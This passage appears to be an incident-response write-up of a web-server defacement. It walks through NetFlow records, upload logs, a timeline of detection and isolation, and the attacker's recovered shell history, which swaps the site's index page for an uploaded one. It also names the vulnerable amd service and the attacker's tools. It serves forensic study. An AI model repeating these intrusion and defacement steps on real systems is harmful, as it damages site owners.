0116.16:47:13.546  0116.16:47:18.918  yyy.253.90.46     137.189.victim1   1146 (         )    2222 (         )    6     248
0116.16:48:10.818  0116.16:48:52.886  yyy.253.90.46     137.189.victim1   1146 (         )    2222 (         )    6     271
0116.17:23:11.712  0116.17:24:00.240  yyy.253.90.46     137.189.victim1   1146 (         )    2222 (         )   75   33065
0116.17:25:16.336  0116.17:25:41.368  yyy.253.90.46     137.189.victim1   1155 (         )      80 (   www   )   10    1217
0116.17:25:13.60   0116.17:25:35.824  yyy.253.90.46     137.189.victim1   1154 (         )      80 (   www   )   12    1559
0116.17:25:57.40   0116.17:26:22.940  yyy.253.90.46     137.189.victim1   1161 (         )      80 (   www   )   34    2229
0116.17:26:05.164  0116.17:26:28.692  xx.14.43.220      137.189.victim1   1374 (         )      80 (   www   )   12    1661
0116.17:26:09.288  0116.17:26:34.196  xx.14.43.220      137.189.victim1   1375 (         )      80 (   www   )   10    1268
0116.17:27:13.256  0116.17:27:33.416  xx.14.43.220      137.189.victim1   1376 (         )      80 (   www   )   11    1791
0116.17:27:14.904  0116.17:27:38.916  xx.14.43.220      137.189.victim1   1377 (         )      80 (   www   )    8    1448
Comparing the timestamp of the changed web page with the message log, we believe yyy.253.90.46 made the change: the two rz uploads below are logged at 17:31 on victim1's clock, which runs about 8 minutes fast, i.e. about 17:23 router time, and the only session at that moment is the 75-packet, 33 KB inbound flow from yyy.253.90.46 to port 2222 (17:23:11 to 17:24:00), consistent with uploading the 16 KB root.JPG. (The two rows from yyy.253.42.1 with source port 0 and destination port 2816 are not TCP at all: NetFlow stores the ICMP type and code in the destination-port field as type*256+code, and 2816 = 11*256 is ICMP Time Exceeded, the kind of reply a router returns to traceroute.)
Jan 16 17:31:31 victim1 rz[29281]: [root] index.htm/ZMODEM: 423 Bytes, 402 BPS
Jan 16 17:31:45 victim1 rz[29281]: [root] root.JPG/ZMODEM: 16476 Bytes, 1279 BPS
From the .bash_history we can see:
who
woot
cd home/httpd/html
Is
ls
mv index.html index2.html
ls
rz
mv index.htm index.html
w00t
heat#
So victim1 was put on the hacked-site list at http://www.attrition.org/mirror/attrition/2000-01.html. Since the web page had changed there was a lot of port 80 traffic to victim1, so that the "heat" group could show off. :(
Jan 17
At 13:48, I was informed by CSC that victim1 was hacked. Their web admin had received a mail informing them that victim1 was hacked. At 14:00, victim1 was disconnected from the IE network and put into a private IP network for further investigation.
Jan 18
Analysed the victim1 logs and system files.
Examined the router NetFlow log.


Jan 19
Identified the attacking sources and sent security alerts to the corresponding system administrators.
Jan 20
By further reviewing the NetFlow log, I discovered that victim2 had been hacked too, since Jan 15, via the same method used on victim1.
Jan 21
victim2 was isolated from the IE network and plugged into the private network for further investigation. The attacker had left a bscan tool and some log-cleaning utility behind.

Remarks

Actually, victim1 and victim2 did not provide any service to any user and had never been announced to anyone. The attackers found them purely through network scanning: a host does not have to be advertised to be found, and any machine that answers on port 111 with a vulnerable amd registered will be picked up by a /16 sweep like the ones logged above. Attackers are always looking for holes to exploit.


References

Here are some references; take a look if you are interested and have time. :)